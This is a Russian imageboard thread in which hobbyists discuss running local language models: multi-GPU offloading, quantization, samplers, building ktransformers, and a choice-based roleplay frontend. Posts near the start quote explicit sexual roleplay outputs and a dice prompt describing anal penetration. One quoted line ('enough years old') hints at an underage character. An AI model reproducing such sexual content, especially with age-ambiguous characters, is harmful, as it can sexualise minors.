Аноним 26/04/25 Суб 16:18:59 #370 №1176817

Аноны, а как вы запускаете на нескольких карточках?
Вот пытаюсь запустить через кобольт б32 на 2х по 24гб, как было 32 слоя gpu из 43, так и осталось. Подкидываю второй карточкой старую 3060, он вообще говорит что у обоих 16 слоёв будет использовать.

Аноним 26/04/25 Суб 16:30:18 #371 №1176834

Погонял еще синтию на гемму3 - вот где хайденгем для мазохистов. Подойдет не всем - оче специфичный (иногда ужасный) стиль текста если не мучать промтом. В датасет добавили ризонинга, очень интересно себя проявляет со степед синкинг и доп инструкциями. Соя геммы получила новую обертку, но модель умная и послушная - может отыграть deepest darkest без жб. Если отпустить дайсы на все посты - активно генерирует рофловые ситуации уровня
> enough years old, иди закрой замок чтобы нам никто не мешал @ критическая неудача @ замок ломается
> неважно нас никто не потревожит, давай обниматься @ критическая неудача @ в дверь вламывается другой герой фендома @ чи шо делаешь с our light, ирод
> нахер границы, я тут босс, проваливай или присоединяйся @ неудача @ dead end
или
> критический успех @ ну раз у нас тут нет законов и все согласны то почему бы и нет, [x]
Главное что ну оче активная и без шизы, не теряется на больших контекстах двигая сюжет. Кумботы соблазняют, обычные чары обижаются/страдают/дают отпор при плохих действиях, или принимают ласки/идеи если действовать деликатно. Одна из немногих моделей, где чары дают строгий отказ если что-то противоречит их "убеждениям" и нет других склоняющих факторов.
>>1176817
Выстави выгрузку всех слоев вручную, не используй "авто".

Аноним 26/04/25 Суб 16:40:40 #372 №1176854

>>1176834
А что писать в ручной выгрузке? Есть гайды?

Аноним 26/04/25 Суб 16:40:44 #373 №1176855

>>1176834
>Если отпустить дайсы на все посты - активно генерирует рофловые ситуации
Можешь скинуть промпт на дайсы после каждого ответа?

Аноним 26/04/25 Суб 16:44:51 #374 №1176864

>>1176358
>А купив ещё одну 3090 мне станет доступен
123B 4bpw тебе станет доступен, с 32к кэша в Q8. В ггуфе - I4XS. А если учесть, что в экслламе-3 4bpw от 8 уже мало чем отличаются, то жить можно.

Аноним 26/04/25 Суб 16:48:41 #375 №1176882

>>1176864
По цифрам прирост в мозгах всего в 4.5 раза.
По моим наблюдениям любой прирост меньше х10 хуета которой ты не заметишь, т.е с 8б и 12б норм перекатываться на 123б

Аноним 26/04/25 Суб 16:53:56 #376 №1176907

>>1176882
Между 8б (и даже 12б) с 32б нет разницы?
)))))))))

Аноним 26/04/25 Суб 16:54:43 #377 №1176910

>>1176864
> в экслламе-3 4bpw от 8 уже мало чем отличаются
Очень уж большое художественное преувеличение.

Аноним 26/04/25 Суб 16:55:33 #378 №1176916

>>1176854
> что писать в ручной выгрузке
Системный промт
>>1176855
https://pastebin.com/JMucRxbG
Не после а перед. Но лучше их включать только в определенные моменты, а не постоянно, иначе будет цирк с конями.
> The Dice_1 has a value of 1 - critical failure. {{char}}'s anal is too tight and unyielding, fingers can't penetrate.
> The Dice_2 has a value of 6 - success. Lube is applied smoothly, reducing friction.
> The Dice_3 has a value of 1 again - critical failure. {{char}} can't hold the bracing position, her legs give out from nervousness.
И лучше сразу разделить на 2 последовательные части, так лучше работает.
>>1176864
> с 32к кэша в Q8
Больше, если система не занимает видеопамять.
>>1176882
Странные у тебя цифры.

Аноним 26/04/25 Суб 17:03:23 #379 №1176940

>>1176907
Есть в бенчах и вопросов уровня как подтереть жопу
В рп разницы нет.

Аноним 26/04/25 Суб 17:05:26 #380 №1176945

>>1176940
Ты один из тех, у кого всё рп сводится "я тебя ебу - ты меня ебёшь"?
Ну да, может быть и нет разницы в таком случае.

Аноним 26/04/25 Суб 17:06:42 #381 №1176950

>>1176940
> В рп разницы нет.
Коупящий пиздабол

Аноним 26/04/25 Суб 17:15:06 #382 №1176968

>>1176916
>Больше, если система не занимает видеопамять.
Возможно, но не все могут её освободить. На практике 32к хватает на приличную карточку, солидный саммарайз и 50 ответов модели на 500+ токенов (плюс твои 50 реплик) и буфер, необходимый для того, чтобы контекст не пересчитывался каждый раз. С таким багажом большая модель хорошо держит сюжет и геймплей, а вот меньше уже неудобно.

Аноним 26/04/25 Суб 17:21:01 #383 №1176983

>>1176834
> очень интересно себя проявляет со степед синкинг
вот уже несколько раз подобное вижу. Интересно стало, ризонинг себя как-то по особому проявляет там или что? Какие-то хитрые настройки или просто включен ризонинг и оно думает перед тем как подумать и потом еще думает перед тем как ответить?

Аноним 26/04/25 Суб 17:26:38 #384 №1176993

>>1176916
>Не после а перед. Но лучше их включать только в определенные моменты, а не постоянно, иначе будет цирк с конями.
Спасибо, попробую.

Аноним 26/04/25 Суб 17:28:52 #385 №1176997

>>1176983
>Интересно стало, ризонинг себя как-то по особому проявляет там или что?
Да странная херня с этим ризонингом во всех его проявлениях. Вроде и прикольно, а попробуешь применить - не то что-то. И неудобно, и результат не тот, который ожидаешь.

Аноним 26/04/25 Суб 17:39:59 #386 №1177013

>>1176997
ну все же нет. Если про корпосетки не говорить, я вот QwQ для генерации карточек персонажей использую. Пробовал РПшить - получается хорошо, но я его на проце верчу и на двух токенах это просто невозможно долго. Подруга заценила, говорит ей модель оформила охуительный БДСМ.

Так что короче под задачу оно норм.

Аноним 26/04/25 Суб 18:10:12 #387 №1177067

>>1176968
Нельзя пройти мимо и не поддвачнуть.
>>1176983
> ризонинг себя как-то по особому проявляет там или что
В какой-нибудь мелкомодель часто не понимает инструкцию и пишет ерунду, или какие-то ультимативно бредовые конструкции с ужасной соей, а потом дает вроде как сносный ответ, который слабо коррелирует с "мыслями". Всратые 24б вроде пытаются, но могут просто начать отвечать в том поле, или просто никадить чего-то а потом ответить игнорируя это. Когда же модель адекватна и тем более понимает концепцию - получешь хороший приквел и опирающийся на него ответ.
Насчет дефолтных, синкинг/ризонинг - просто задроченный паттерн ответа где модель сначала типа "думает" а потом отвечает. Но в рп это не срабатывает адекватно, даже насобирав огроменный перегруженный опус, ответ получается унылый, словно модель путается в этом всем.
Но когда ризнонинг делается по отдельной инструкции с четкими указаниями и форматом - получается лучше, модель действительно опирается на ключевые пункты и может давать более удачные ответы чем без ничего.

Аноним 26/04/25 Суб 18:41:46 #388 №1177133

3949.png

🚨 235000 🚨

Аноним 26/04/25 Суб 18:49:42 #389 №1177146

>>1177133
А нах тебе порезанная D-версия?

Аноним 26/04/25 Суб 18:49:56 #390 №1177147

Анон в прошлом треде кумил киберкарточку, и подсказали что это dystopian robot girlfriend. Карточку я попробовал, но без знания ЛОРа не то, решил чекнуть что за игра.

А еще обсуждали вчера что ллм воспринимаются тупее не столько от тупости моделей, сколько от вседозволенности в ответе, доступности свайпинга/редакта ответа, ну и в целом что ты брюс всемогущий (еще и часто ленивый писать что то кроме "ясно" и "я тебя ебу").

И вот играя в визуальную новелку, где перс хикка, чмо и червь, и когда на него нападает бомж ради 10 баксов и ты не можешь как в ллм написать "пробиваю ему вертушку с ноги в кабину" - появились две мысли:
1. рельсы сюжета/предопределенные действия гг немного корежат после рп
2. но в то же время есть азарт, когда ты именно что ИГРАЕШЬ, а не строишь из себя комнатного демиурга, балансируя между каким-никаким продвижением сюжета в нужное русло vs "рпшенья в блокноте", где модель только поддакивает.

Короче: возникла идея фронтенда на подобие таверны (или плагина к ней), что бы нейронка генерила сначала реплику чара, а потом вторым запросом к бэкэнду, на основе контекста генерировала от 2х до 5ти репликодействий юзера. После чего юзер просто выбирает наиболее ему близкий вариант мышкокликом, и он добавляется в контекст, а чар снова на него отвечает и так по кругу.

Что получаем:
1. визуальную новеллу с бесконечными вариантами сюжета
2. релакс-рп без напряжения ганглия графоманством
3. в отличии от визуальной новеллы реплики будут адаптироваться под выбор юзера, чед постепенно будет получать более чедовые варианты ответов, романтик - романтичные, хикка - односложные пук среньк итд
4. решаем вопрос "легкодающими", к куму нужно будет азартно подводить

Думаю со временем попробую накодить что то такое, ради интереса. Реквестую критику/дискасс.

Аноним 26/04/25 Суб 19:15:02 #391 №1177230

>>1176945
> "я тебя ебу - ты меня ебёшь"?
Ты только что рп геммы 27б.

Аноним 26/04/25 Суб 19:19:59 #392 №1177248

>>1177147
В соседнем треде есть подобный пресет а4а в шапке для корпосеток. Там дается несколько вариантов действий после события с учетом навыков (сила, мудрость, удача) описанных в карточке юзера и на основе этого делается бросок (удача, неудача) и развивается сюжет. Выглядит интересно, тк даже критическая неудача (вы хотели пнуть но промахнувшись выпали из окна) двигает сюжет. Но оно не работает с локалками.

Аноним 26/04/25 Суб 19:22:48 #393 №1177263

>>1177147
Да, все это делается условно просто на мультизапросах и агентных системах, но дико заморочно и неудобно вплоть до нереализуемости в таверне.

Хороший интерфейс для пердоликов, любящих комфорт мог бы выглядеть как фокус в картинкогенерациях. То есть, открыв капот ты можешь накидать последовательность нод как в comfyui, где из элементов карточки персонажа, системного промта, истории сообщений, всякого-всякого, через лапшу можно формировать нужный запрос к сетке, делать дополнительные вызовы с полным контролем всего и свободой (а не огрызок как в таверне), делать какие-то еще манипуляции, и после этого всего уже выдавать ответ и дополнительные поля к нему.
То есть, можно напердолить последовательность с предрасположенными правилами, проверкой поста юзера на соответствие им, роллы вероятностей, оценка исхода, какой-то ризонинг при необходимости, переменными статов, много чего еще и формирование ответа уже на основе вот этого всего обработанного. Чтобы в зависимости от хотелок, мог менять свое положение от червя до бога, выстраивать сложные системы и все прочее, возможности ограничиваются только желанием пердолиться.
А потом закрыв это, оказываешься в привычном минималистичном чат-интерфейсе, где можно комфортно и не отвлекаясь все это инджоить.
>>1177248
> подобный пресет а4а
Копиум же, это просто напиханные инструкции, которые после накопления первых постов получают ужасное смещение от контекста.
> Но оно не работает с локалками.
Работает если раскидать промты.

Аноним 26/04/25 Суб 19:23:31 #394 №1177265

Там МК снова обосрался видосом https://www.youtube.com/watch?v=K3nvny5x47w

V100 на 7b q6 выдала 72 токена/сек, 16 гигов HBM памяти, 30к рублей.

Ну что, берем? =D

Аноним 26/04/25 Суб 19:29:32 #395 №1177287

>>1176758
> Нужен полноценный системный пихон с хидерами (дев версия), а не энв конды
Ок. Накачу.

> Там единая сборка на всех, чел.
Нет. =) Там буквально куча нюансов, ты хотя бы гит открой.

https://github.com/kvcache-ai/ktransformers/blob/main/doc/en/llama4.md
git checkout support-llama4
USE_BALANCE_SERVE=1 bash ./install.sh

Как минимум — разные бранчи + разные настройки. Ты можешь билдить баланс серв, можешь не билдить. Для дипсика билдить не обязательно.

> Как там в мезозое?
Не знаю, это 12.6 cuda с оф сайта невидии. Спроси их. =) local installer, точно нет ошибки.

> Торч на 12.6 должен намекать.
Так это и есть куда 12.6, что мне-то делать? :)

> явно об очевидной ошибке сигнализирует
Какой, лол? =D

Ты сам тут с три короба ерунды насочинял, совершенно не понимая, как работает эта штука.
Ну давай не будешь стрелки метать, попробуй сам повторить мои шаги — получишь тот же результат.

Я согласен, что конда могла подосрать, но все остальное делается по их гайдам 1 в 1 все шаги и все проверки. Я хотя бы читал базу, в отличие от тебя. =)

Плюс, сам подумай, почему есть куча ишью открытых, где десятки человек пишут о той же ошибке — и никто не может починить и помочь им, включая автора.
Значит ошибка не в том, что нвидия накосячила с номером куды в релизе (что не влияет, это я уже проверял, кстати, все работает в другом софте), а где-то в ином месте.

Аноним 26/04/25 Суб 19:52:17 #396 №1177356

>>1177287
> Там буквально куча нюансов, ты хотя бы гит открой.
Открываю и вижу несвежий бранч, большая часть которого вмерджена в свежую ветку, с отличиями в файлах, которые не должны влиять на сборку и подобные ошибки.
> Не знаю, это 12.6 cuda с оф сайта невидии
> nvidia-cuda-toolkit is already the newest version (12.0.140~12.0.1-4build4)
Ты запутался в пакетах или что-то поломал смешиванием разных источников. nvcc --version что выдает? CUDA_HOME и прочая база прописаны? Если несколько куд установлено то нужно проверить выбор нужной по дефолту в альтернативах. Сабмодули гита скачал или только один бранч их репы?
> не будешь стрелки метать
Чего тут метать если сразу видно несоответствие версий? Устрани и потом смотри детальный трейсбек.
> есть куча ишью открытых
Там очень много ишьюсов, от бреда хлебушков, которые не справляются с совсем дефолтом, но вот таких рофлов https://github.com/kvcache-ai/ktransformers/issues/1201
У них не полный туториал, некоторые вещи пропущены, штука не самая простая и оче сырая, но при этом много народа пытаются ее запустить. Но вроде как оформить базовое дефолтное окружение - должно быть посильной задачей.
> нвидия накосячила с номером куды в релизе
Не может быть там косяков, ты просто не разобрался с версиями или непривычен к линуксу.

Аноним 26/04/25 Суб 19:57:42 #397 №1177374

>>1177265
> берем?
Нет. Это тогда надо собирать отдельный риг с пачкой карт, штук 8. Это хуйня уровня майнинг-рига будет. Я ебал таким заниматься, проще 10 баксов в месяц опенроутеру заносить.

Аноним 26/04/25 Суб 20:09:17 #398 №1177397

>>1177265
Если 32гиговую то может быть интересно.

Аноним 26/04/25 Суб 20:10:05 #399 №1177400

>>1177374
Рекламщик опенроутера, ты заебал. Нахуй ты вообще в этом треде сидишь, если тут локалки обсуждают? Клуб любителей цензуры и лимитов на два треда ниже

Аноним 26/04/25 Суб 20:11:38 #400 №1177401

>>1177397
Вперед, братик, бери

Аноним 26/04/25 Суб 20:18:56 #401 №1177421

>>1177401
Нахуй надо этот шлак за такие деньги. Субъективно здесь потолок в 60-70к, не удивлюсь если при покупке по отдельности оно столько и будет стоить.

Аноним 26/04/25 Суб 20:25:50 #402 №1177438

>>1177248
>подобный пресет а4а в шапке для корпосеток
Вангую что это не то, но чекну.
>Но оно не работает с локалками.
Почему? Локалки мб потупее, но они гораздо гибче в применении. Даже бросок кубика если нужен, можно программно реализовать обвязкой.
upd прочитал анона ниже, а4а это выходит просто насрать в промт инструкцию, которую плохо считающая LM все равно зафакапит. Хуита, я сторонник максимально очищенного от лишнего говна контекста.

>>1177263
>последовательность нод как в comfyui
Да, но учитывая что я умею в питухон и практически не умею в жс и фронт, я точно такое делать не буду, если уж планировать самописный софт с гибким конфигом, проще задавать его жсоном/ямлом аля пайплайн gitlabCI.yaml, чем с нодами ебатся.
>до нереализуемости в таверне
>привычном минималистичном чат-интерфейсе
Таверна имхо то еще говно с точки зрения эргономики, один только промтинг инструкта/карточки раскиданный по половине интерфейса то там, то тут что стоит. Или переключение по чатам. Или куча мелкоиконок на сообщении, из которых юзаешь 2-3.
В идеале хочу запилить "свою таверну", примитивный фронт для кобольда, с которым и буду делать всякие эксперименты по типу агентов, бросков куба, "варианты ответа" итд

Аноним 26/04/25 Суб 20:27:53 #403 №1177442

Ребзи, а подскажите пожалуйста какие настройки в кобольде или еще где можно выставить что бы сетка от 24b быстрее генерили? Вот даркнес 12b q8 почти инстантом пасты шлепает, а
Dans-PersonalityEngine-V1.2.0-24b-Q6_K до 2х минут может кряхтеть.

Аноним 26/04/25 Суб 20:32:48 #404 №1177450

Поделитесь нормальным пресетом для Command-R 32b, пожаста

Аноним 26/04/25 Суб 20:34:34 #405 №1177453

>>1177438
>В идеале хочу запилить "свою таверну", примитивный фронт для кобольда, с которым и буду делать всякие эксперименты по типу агентов, бросков куба, "варианты ответа" итд
Кидаешь инструкцию модели: "Дай мне 4-5 вариантов действий для юзера". Она даёт. Плоские, банальные, совсем не то, что ты хотел бы. Ты можешь стереть и повторить запрос - и получишь примерно такие же банальности. Или можешь написать свой вариант. Понимаешь проблему?

Аноним 26/04/25 Суб 20:35:30 #406 №1177458

>>1177438
Тут уже хозяин-барин. Просто фишка того подхода в том, что ты не просто какие-то последовательности в жсонах или в простом синтаксисе делаешь, и можешь буквально делать свои вставки исполняемого кода. Там уже он нужным образом обработает и формирует промт, реализует функциональные вызовы и абсолютно любые фичи, вплоть до построения критериального бим-сеарча с избавлением от нежелательного без импакта на остальное, абсолютно любого семплинга, реализации спекулятивного декодинга или разнообразия выдачи противоположной операцией с любыми беками (хоть разными) и т.д. И в беке там удобный и быстрый пихон, ну а фронт - увы. Хотя тоже можно гуйню на питоне заделать, просто довольно заморочно окажется.
> Таверна имхо то еще говно с точки зрения эргономики
Да, но больше ничего жизнеспособного нет.
> примитивный фронт для кобольда
Не привязывайся к этой сомнительной штуке, иначе это обречено. Используй общий апи или варианты под разные лаунчеры, тем более что большая часть там унифицирована.
>>1177453
> Понимаешь проблему
Что ты этим имплаишь?

Аноним 26/04/25 Суб 20:39:18 #407 №1177463

>>1177442
Ты хотя бы железо свое напиши

Аноним 26/04/25 Суб 20:44:48 #408 №1177467

>>1177438
> В идеале хочу запилить "свою таверну", примитивный фронт для кобольда, с которым и буду делать всякие эксперименты по типу агентов, бросков куба, "варианты ответа" итд
А можно просто сделать плагин для таверны. Сам же пишешь, что не умеешь в фронтенд. У таверны есть либы и все необходимое, чтобы
а) дать тебе решение для визуального оформления идеи
б) поделиться идеей с людьми, получить фидбек и признание

изобретать велосипед зачем? и наивно полагать, что ты один справишься лучше всех тех, кто делает таверну (опен сорс проект, напомню)
не первый раз вижу, как люди утверждают, что интерфейс в таверне кал. и каждый раз думаю - вы правда думаете, что сделаете лучше?

Аноним 26/04/25 Суб 20:46:30 #409 №1177469

Олсо, почему вы просто не сделаете форк таверны и не переработаете интерфейс так, как вам нужно? или и вовсе не сделаете тему. ведь если она получится такой ахуенной, то непременно всем зайдет и ее замерджат

Аноним 26/04/25 Суб 21:30:43 #410 №1177545

>>1177463
4090 24 gb, amd ryzen 9 7900x 12-core 64 оперы

Аноним 26/04/25 Суб 21:32:18 #411 №1177555

>>1177545
Ставь Exllamav2 через tabbyAPI. Будет около 32-35 токенов в секунду на 6bpw. Тебе с 24гб врама нужно только в врам всё грузить.

Аноним 26/04/25 Суб 21:34:10 #412 №1177561

>>1177545
Все ясно, устаревший кал. Купи 5090 и 9900x (хотя лучше конечно 9950x), тогда побыстрее будет работать

Аноним 26/04/25 Суб 21:40:02 #413 №1177575

>>1177356
> Ты запутался в пакетах или что-то поломал смешиванием разных источников.
Нет.
Берешь WSL2 Ubuntu.
Накатываешь куду скачанную по их командам с их сайта.
Получаешь:

nvidia-cuda-toolkit is already the newest version (12.0.140~12.0.1-4build4).

nvcc: NVIDIA (R) Cuda compiler driver
Copyright (c) 2005-2024 NVIDIA Corporation
Built on Wed_Aug_14_10:10:22_PDT_2024
Cuda compilation tools, release 12.6, V12.6.68
Build cuda_12.6.r12.6/compiler.34714021_0

> Чего тут метать если сразу видно несоответствие версий?
Так тыкни пальцем — где?

> Не может быть там косяков, ты просто не разобрался с версиями или непривычен к линуксу.
Ну так как мне это исправить? :)
Если ты привычен, скажи как, потому что моего опыта тут не хватает.

Я вообще не вижу проблему в том, что работает везде, кроме этого конкретного скрипта.

subprocess.CalledProcessError: Command '['cmake', '/home/bahamut/ktransformers/csrc/balance_serve', '-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=/home/bahamut/ktransformers/build/lib.linux-x86_64-cpython-311/', '-DPYTHON_EXECUTABLE=/home/bahamut/anaconda3/envs/ktransformers/bin/python', '-DCMAKE_BUILD_TYPE=Release', '-DKTRANSFORMERS_USE_CUDA=ON', '-D_GLIBCXX_USE_CXX11_ABI=1', '-DLLAMA_NATIVE=ON', '-DEXAMPLE_VERSION_INFO=0.2.4.post1+cu126torch27avx2']' returned non-zero exit status 1.

Мне кажется, проблема все-таки в скрипте.
Все остальное прекрасно собирается и компилится, кроме этого файла.
Шо куда жмать-то йопта. Давайте, подсказывайте. =)

Ладно, я еще попробую на полностью голой системе без конды все поставить, посмотрю, че будет. Я конду всегда юзал от лени и потому что она простая оч. Активировал и все внутри копошишься. Знаю, осуждаемо.

>>1177401
Э-э-э, чо-та я не уверен.
Хотя они есть, это интересно.

Аноним 26/04/25 Суб 21:44:50 #414 №1177585

>>1177555
Понял, спасибке затестим.

Аноним 26/04/25 Суб 21:57:55 #415 №1177627

photo2025-04-2419-48-20.jpg

>>1177401
Эту ебату можно использовать только в специальном сервере если что.

Аноним 26/04/25 Суб 22:02:41 #416 №1177638

>>1177450
>Поделитесь нормальным пресетом для Command-R 32b, пожаста
Да хотя бы настройки сэмплеров кто подсказал :)

Аноним 26/04/25 Суб 22:03:20 #417 №1177641

>>1177467
>>1177469
Разбираться в незнакомом языке, разгребать авгиевые конюшни надмозгов и безумной реализации многих вещей. Многие разбирающиеся хейтили код таверны, наверно им виднее. Но путь велосипеда тоже не обязательно будет успешным и легким.
>>1177575
> nvidia-cuda-toolkit is already the newest version (12.0.140~12.0.1-4build4).
Должно быть
> Package: cuda-toolkit
> Version: 12.8.1-1
> Priority: optional
> Section: multiverse/devel
> Maintainer: cudatools <[email protected]>
и на нативном линуксе и в wsl идентично. Вместо 12.8 может быть 12.6 офк, но никак не 12.0.
> Так тыкни пальцем — где?
Именно это. nvcc может быть от конды, проверь локацию через type nvcc
> Ну так как мне это исправить? :)
Начни с удаления куды и установки пакетов по инструкции с оффсайта, привести в порядок не помешает. Там буквально 4 строки https://developer.nvidia.com/cuda-downloads?target_os=Linux&target_arch=x86_64&Distribution=WSL-Ubuntu&target_version=2.0&target_type=deb_network версию можешь поменять на 12.6
> balance_serve
Возможно здесь как раз нехватка нужной либы в системе, уже не помню конкретно какая, поищи в репе. Попробуй собрать без баланс сервера, но тогда придется накатывать фиксы, о них в прошлом треде есть.
>>1177638
Simple-1

Аноним 26/04/25 Суб 22:05:07 #418 №1177645

>>1177641
>Simple-1
База.

Аноним 26/04/25 Суб 22:10:52 #419 №1177663

>>1177641
> Именно это. nvcc может быть от конды, проверь локацию через type nvcc
С чего бы, если я вручную прописал путь прямиком к свежеустановленной куде сам? :)
Снова мимо.

> Начни с удаления куды и установки пакетов по инструкции с оффсайта, привести в порядок не помешает.
Проблема в том, что это буквально так и сделано с нуля, понимаешь? Т.е., нет смысла повторять второй раз проделанную. Проблема 100% не в куде.

> Возможно здесь как раз нехватка нужной либы в системе
Вот я тебе всю дорогу и говорю, что проблема с билдом конкретным.
Сейчас я просто создал вторую виртуалку и туда накачу голый питон, даже без венвов, попробую все совсем в чистую поставить.

Я просто листал вчера ишью гита и там стока всего, и ничего не помогало. Но я просмотрел не все треды, возможно просто проебланил нужный и все. Может ларчик просто открывается, да меня лень раньше заела.

Уф, поехали!..

Аноним 26/04/25 Суб 22:14:56 #420 №1177676

>>1177663
Ебись и ной что все ок дальше, не всем дано.

Аноним 27/04/25 Вск 00:19:27 #421 №1177969

Ну в самом деле, есть у кого-нибудь нормальные сэмплеры для командира 08 2024 32б?
Впервые его запустил, ахуеваю в наилучшем смысле, но он очень чувствителен к семплерам. Инфы мало, вроде темпу 0.3 рекомендуют. Аутпуты хорошие, но проблему лупов не могу разрешить. Вероятно, дело в семплерах, а не в модели

Аноним 27/04/25 Вск 00:41:15 #422 №1177984

>>1177969
>но проблему лупов не могу разрешить
Поставь Repetition Penalty (штраф за повтор) в 1.1, а окно для этого пенальти (окно для штрафа за повтор) в 2048 - должно помочь. Температура 0.3 может быть хороша для кодинга, но для ролеплея маловата будет.

Аноним 27/04/25 Вск 00:57:53 #423 №1178004

>>1177984
Стало гораздо лучше, спасибо большое. Буду рад, если другие аноны поделятся своим опытом с командером

Аноним 27/04/25 Вск 01:03:01 #424 №1178008

>>1177984
Кстати, как работает штраф за повтор. Модель пытается вместо повторов всавлять другие слова вместо повтора, или вообще нихуя не пишет?

Аноним 27/04/25 Вск 01:10:29 #425 №1178027

>>1177969
Все ли у тебя в порядке с промтами и разметкой?
> темпу 0.3 рекомендуют
Как-то маловато.
>>1178008
Для начала глянь как работают ллм и как происходит семплинг. Штраф за повтор снижает вероятности токенов, которые часто повторялись в указанном окне, соответственно они выбираются с меньшей вероятностью а вместо них могут попадать другие. Если вдруг это будет eos токен то остановится, но на полуслове или посреди предложения обрываться не должно офк.

Аноним 27/04/25 Вск 01:13:26 #426 №1178033

>>1178008
>или вообще нихуя не пишет?
Ну пишет же что-то, сам видишь. Как это конкретно реализовано хз, но по идее часть скорости генерации должно отжирать. Просто иногда без этого никак.

Аноним 27/04/25 Вск 01:19:07 #427 №1178040

>>1178027
Да, с промптом и разметкой все ок. Именно с семплерами не могу разобраться. Впервые думаю модель, что настолько к ним чувствительна. Стало лучше, когда по совету анона rep pen range поставил больше, до 2048

Аноним 27/04/25 Вск 01:40:18 #428 №1178051

>>1177641
Итак.

ktransformers

Держу в курсе, мало ли кому пригодится.

sudo dpkg -i libaio1_0.3.112-5_amd64.deb

sudo apt install cmake=3.31.7-0kitware1ubuntu24.04.1 cmake-data=3.31.7-0kitware1ubuntu24.04.1

Не знаю, что из них, но локальная установка libaio1 и установка cmake 3.31.7 привели к успешному билду.

Например, так.

Аноним 27/04/25 Вск 02:24:18 #429 №1178071

>>1177453
>Плоские, банальные, совсем не то, что ты хотел бы.
Ну тут думаю важен промтинг грамотный. Просто если так заранее рассуждать, то и обычный рп хуита, лучше фанфик в блокноте пиздатый писать.

>>1177458
>Просто фишка того подхода в том, что ты не просто какие-то последовательности в жсонах или в простом синтаксисе делаешь, и можешь буквально делать свои вставки исполняемого кода.
Я думал ты комфи-ноды пропагандируешь как возможность собирать пайплайн не-кодерам, как уровень понятной абстракции. Я сказал что реализовать такое сложно (ну мне например), как максимум - простые yaml парсить, которые относительно человекочитаемы и даже мартышка сможет копипастом сделать то же, что и на нодах.
Сейчас ты говоришь про гибкость, вставки кода, спекулятивный декодинг... Так если я буду писать код, то мне проще на том же питухе сразу написать/дописать это, чем сначала сделать йоба-ноды, а потом уже на них мышкой строить все это.
Не понял тут тебя в общем.

>Не привязывайся к этой сомнительной штуке (кобольд)
Пока это у меня основной ллм-бэкэнд, и у него понятно описанное API, мне проще всего работать с ним, пока я изучаю всю эту тематику. Офк я не собираюсь пока лезть в кишки кобольда, а селектор апи-адаптеров всегда можно потом докрутить будет.

>>1177467
>Сам же пишешь, что не умеешь в фронтенд.
Ну при помощи той же нейронки я уж пару простых js скриптов как нибудь напишу (если вообще решу делать веб-морду, а не системный UI на каком нибудь UI-фреймворке). А вот в nodeJS потрохах копаться нет ни малейшего желания.
> можно просто сделать плагин для таверны
>У таверны есть либы и все необходимое
Возможно к этому я в итоге и приду. Но сейчас вижу это как "собрать свой велосипед" vs "собрать велосипед вокруг таверны". Более того, я преследую цели собрать инструмент взаимодействия с llm для себя удобный, а так же получше изучить llm, llm api, ту же фронтэнд-часть. А изучать скриптописание для таверны прости, но не особо интересно.
>и каждый раз думаю - вы правда думаете, что сделаете лучше?
Для себя и своих задач (не только кум, но и тот же ассистент, агенты, автоматизация) - 100% думаю сделаю лучше. Лучше таверны для всех - врятли. Я уважаю труд создателей таверны, но у них отличный от моего посыл - они делают интерфейс для РП, доступный каждому, у меня же пет-проект для самообучения + хочу удобный мультитул для llm, полностью для меня прозрачный.
Вот этот господин очень верно описал >>1177641 :
>Разбираться в незнакомом языке, разгребать авгиевые конюшни надмозгов и безумной реализации многих вещей.
Не хочу.
>Но путь велосипеда тоже не обязательно будет успешным и легким.
Ну тут я однозначно обрету опыта и на это у меня стоит шишка, даже если в итоге я обосрусь и вернусь к изучению таверноплагинописания. По крайней мере попробовать стоит, делать что то для РП на таверне - еще ок, но например агента для шелла или даже кастом-ассистента плагинами на таверну выстраивать это пиздец.

Аноним 27/04/25 Вск 02:45:43 #430 №1178091

>>1178051
>привели к успешному билду.
Ебилдов мы дождались, теперь ждём отчётов о скорости генерации на этой дьявольской молотилке. Подозреваю результат не сильно лучше лламыспп с выгрузкой в ОЗУ.

Аноним 27/04/25 Вск 02:54:31 #431 №1178096

>>1177453
>>1178071
>>ЛЛМ за юзера будет генерировать плоские, банальные, реплики, не те, что бы ты хотел.
Увлекся техносрачем и как то не раскрыл это. Вообще если в таверне изредка я затупливаю "что бы такого сказать кроме ок, пошли" я пользуюсь функцией "сгенерировать ответ за юзера" и нейронка впринципе подбрасывает норм. Если правильно задать инструкт, и дать понять что "сгенерируй 3 РАЗНЫЕ развилки", то будет вообще неплохо.
Однако все равно есть риск уйти в луп или просто словить жесткое фомо разряда "ну дибил дибил, она же тебя хочет, схвати ее за вареник", а нейронка предлагает "убежать в страхе" и "сказать какая чудесная погода".
Возможно стоило бы придумать какую то механику, что то поинтереснее чем просто вариант "написать свой ответ".

Аноним 27/04/25 Вск 03:04:41 #432 №1178098

Как же Коммандер хорош, это просто нечто, ахаха. Играю классику - фэнтези приключение с карточкой, где указано, что персонаж ненавидит юзера и объясняется почему. В общем, спустя сто сообщений меня зарезали во сне. В голос бля, это просто восторг. Почему так мало про Коммандера пишут? Или хайп прошел уже, т.к. модель августа 2024?

Аноним 27/04/25 Вск 03:07:10 #433 №1178099

>>1178096
>Возможно стоило бы придумать какую то механику, что то поинтереснее чем просто вариант "написать свой ответ".
Да уж, придумать такую механику было бы неплохо. Жутко бесит, когда даже умная модель предлагает пустые варианты. Может быть что-то вроде "Подумай, какие действия возможны для юзера, учитывая всё уже произошедшее" поможет.

Аноним 27/04/25 Вск 03:11:43 #434 №1178100

>>1178051
> установка libaio1
https://askubuntu.com/questions/1512196/libaio1-on-noble
На более старом цмейке 3.28 без вопросов собирается.
>>1178071
> как возможность собирать пайплайн не-кодерам
Как возможность быстро и удобно собирать что угодно, от простейшего из готовых, до написания своего. Оче удобный уровень абстракции, когда нужно просто состыковаться по классам и все, не мучаясь в раздумьях об остальном. Конечно же сложно, но сделав это можно покрыть очень широкую область с запасом на будущее и все прочие варианты.
> Сейчас ты говоришь про гибкость, вставки кода, спекулятивный декодинг...
Просто примеры многообразия того, что можно реализовать с помощью написания кастомных нод на взаимодействие с ллм или просто наворачивая схему из примитивов. При этом сам фронт никак не страдает и отделен, ибо является лишь движком для нод и потом финальный результат даст в виде постов юзеру в красивой обертке. Так я вижу йоба интерфейс чтобы править всеми, о чем и зашла беседа, ты уже офк делай что сам надумал.
> мне проще на том же питухе сразу написать/дописать это
Это будет хардкод, который нельзя быстро и удобно перетасовать. А переписывание или добавление своего будет сильно осложнено особенностями интеграции туда.
> основной ллм-бэкэнд
Хз зачем он вообще нужен при существовании жора-сервера и тем более остальных, еще и с легаси вызовами несовместимыми с остальными, странная вкусовщина.

